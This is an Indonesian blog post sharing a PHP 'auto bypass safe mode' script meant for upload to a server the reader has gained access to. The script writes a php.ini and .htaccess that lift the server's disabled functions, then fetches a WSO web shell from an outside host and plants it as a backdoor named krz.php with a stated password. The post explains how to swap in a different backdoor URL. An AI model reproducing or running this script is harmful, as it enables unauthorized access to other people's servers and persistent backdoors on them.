Auto Bypass Safe Mode On

Assalamualaikum Warahmatullahi Wabakaratu

Pada kesempatan ini, saya akan membagi script Auto Bypass Safe Mode yang sebenarnya sudah banyak, tapi saya suka memakai script ini karena simple dan sederhana. Sebelumnya, terkadang kita menemukan sebuah server dimana server tersebut menonaktifkan berbagai fungsi yang kita butuhkan. Sebuah contoh teradapat pada gambar dibawah.


Terlihat pada gambar diatas, banyak sekali fungsi yang didisable oleh server, bahkan perintah "uname -a" pun tidak diperbolehkan. Hal ini tentu sangat menganggu :D. Jadi untuk mengatasinya, langsung saja download script dibawah, dan upload ke server yang diinginkan. Script tersebut akan otomatis membuat folder "img" dan backdoor akan terbuat didalam folder "img" dengan nama "krz.php"

Berikut isi dari script tersebut:

<?
/* 
 * Title : Bypass Server [ Sfa7 Trick ]
 * Coder : Dr.KroOoZ
 * Greets To : b0x 
 * Must Upload Like Here : /home/user/www/ | http://localhost.com/bypass.php
 * Password Shell is :  b374k
 */
# Mkdir
$dir = "mkdir";
$bb = $dir('img');
if($bb){
    echo "[img] => Folder Create Complate !";
} else {
    echo "[img] Error !";
}
# php.ini
$img = fopen('img/php.ini', 'w');
$sec = "safe_mode = OFF
disable_funtions = NONE";
fwrite($img ,$sec);
fclose($img);
if($img){
    echo "<br>[php.ini] => Create Complate !";
} else {
    echo "<br>[php.ini] Error !";
}
# .htaccess 
$create = fopen("img/.htaccess", 'w');
$s3c = "suPHP_ConfigPath /home/".get_current_user()."/public_html/img/php.ini";
fwrite($create ,$s3c);
fclose($create);
if($create) {
    echo "<br>[.htaccess] => Create Complate !";
} else {
    echo "<br>[.htaccess] Error !";
}
# Shell 
$b37 = 'http://files.xakep.biz/shells/PHP/wso.txt';
$sh = file_get_contents($b37);
$open = fopen('img/krz.php', 'w');
fwrite($open,$sh);
fclose($open);
if($open) {
    echo "<br>[img.php] => Shell Upload Complate !";
} else {
    echo "<br>[img.php] => Error !";
}
?>

Beberapa hal langsung di eksekusi ketika script ini dijalankan ialah:

  1. Membuat folder baru dengan nama "img".
  2. Membuat file php.ini.
  3. Membuat file .htaccess.
  4. Dan terakhir akan membuat backdoor sesuai yang telah dipasang didalam script
Backdoor yang diupload bisa kita tentukan dengan mengubah bagian:
$b37 = 'http://files.xakep.biz/shells/PHP/wso.txt';
Upload terlebih dahulu backdoor yang ingin kamu gunakan, kemudian taruh linknya pada baris diatas.

Berikut adalah hasil dari script bypass ini ketika saya upload ke dalam server. Seperti yang terlihat pada gambar dibawah, tidak ada lagi fungsi yang didisable, sehingga kita bisa melihat informasi-informasi penting yang kita butuhkan pada server ini.

Download disini: Bypass Safe Mode On
Untuk versi video bisa anda lihat disini: Youtube - Auto Bypass Safe Mode On

Terima kasih dan semoga bermanfaat.

Posting Komentar